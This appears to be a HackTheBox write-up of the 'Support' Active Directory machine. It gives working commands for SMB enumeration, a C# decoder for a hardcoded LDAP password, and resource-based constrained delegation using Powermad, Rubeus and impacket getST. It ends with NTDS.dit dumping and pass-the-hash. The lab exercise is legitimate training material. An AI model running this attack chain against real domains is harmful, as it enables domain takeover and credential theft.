Support form HackTheBox was an easy rated AD machine which involved enumerating SMB share to find a custom exe which was authenticating to LDAP, on either reversing or analyzing the traffic from the exe we can find the password for ldap user, having access to ldap service we can find the password for support user by checking the attributes, being in Shared Support group, it had GenericAll on the DC which means we can perform Resource Based Constrained Delegation (RCBD) to impersonate as the administrator.
NMAP
Nmap scan report for 10.10.11.174
Host is up (0.14s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-30 19:01:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrappedFrom the nmap scan we can see port 88 is running which means this is a domain controller, we can also see the domain name support.htb so adding this in /etc/hosts file
PORT 139/445 (SMB)
Checking for null authentication on smb, we can see few shares
Accessing support-tools share we can see some tools there like wireshark, putty, sysinternals and etc
I tried downloading SysinternalsSuite.zip with get but it wasn't working maybe there's a limit to transfer file with larget size but this was around 48 MB, it could be timing as it's taking some to time to transfer the file and the default time out for smbclient is 20 seconds
After increasing timeout, the transfer worked
But that archive didn’t had anything as I was expecting it to have something, moving on to UserInfo.exe.zip
This has dll and exe which we can try to analyze with either ILspy or dnspy and for that let's move to windows machine
On opening UserInfo.exe with ILspy we can find the username support in LdapQuery function also we can see another function being called getPassword which returns the password, we can also get the username which is ldap
Checking the getPassword function we can see how it’s returning the plain text password for support user by using the value from enc_password and the key
We can get the plain text password by simply printing the string returned from the function
using System;
using System.Text;
namespace uwu {
class Program {
static void Main(string[] args) {
string enc_password="0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
byte[] key = Encoding.ASCII.GetBytes("armando");
byte[] array = Convert.FromBase64String(enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
}
Console.WriteLine(Encoding.Default.GetString(array2));
}
}
}The credentials can also be retrieved by running userinfo.exe and sniffing the packets with wireshark on the interface
Foothold
Having the credentials we can try to dump usernames from windapsearch
windapsearch -d support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --dc 10.10.11.174
--module usersThe usernames can be sorted with awk
windapsearch -d support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --dc 10.10.11.174 --module users | grep "sAMAccountName" | awk -F ': ' '{print $2}' > user_names.txtHaving the usernames, we can try password spary with kerbrute
Using windapsearach with --full option we can list every attribute set on user objects which will show the password for support user
The credentials can be verified with cme on winrm
This shows Pwn3d! which means that we can use the credentials on winrm to get a shell
Having a shell I ran PowerUp script which didn't showed any thing
Next I tried using Sharphound to gather domain data
Privilege Escalation
Uploading json files to bloodhound, Shared Support Account group which support is a member of has Generical All on the domain controller
This means we have can have complete control over the domain controller by first adding a new computer account with Powermad and abusing write privilege on dc.support.htb to add msDS-AllowedToActOnBehalfOfOtherIdentity which will allow our new machine account to impersonate as any user from the domain to access the domain controller
New-MachineAccount -MachineAccount UwU -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Ver
bosUsing Active Directory Module we can set msDS-AllowedToActOnBehalfOfOtherIdentity
Set-ADComputer dc -PrincipalsAllowedToDelegateToAccount UwU$
Get-ADComputer dc -Properties PrincipalsAllowedToDelegateToAccountNow to get a S4U hash to impersonate as administrator with Rubeus
Rubeus.exe s4u /user:UwU$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /nowrapEven tho we have injected the impersonated ticket for administrator with /ptt pass the ticket still we won't be able to access c$ share or launch cmd with psexec as we need local administrator to do that
So instead we can copy the the ticket from rubeus which gets generated in .kirbi format which we can convert into .ccache and use it with impacket
Rubeus.exe s4u /user:UwU$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /nowrapCopy the hash, base64 decode it and covert it with ticketConverter.py
Or we can request a service ticket with impacket’s getST and use either psexec , wmiexec or smbexec to get a shell
getST.py -spn cifs/dc.support.htb support.htb/UwU\$ -impersonate administratorRunning secretsdump.py to dump NTDS.dit which contains domain user's hashes
With the administrator’s hash we can also perform pass the hash
References
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation
- https://pentestlab.blog/2021/10/18/resource-based-constrained-delegation/
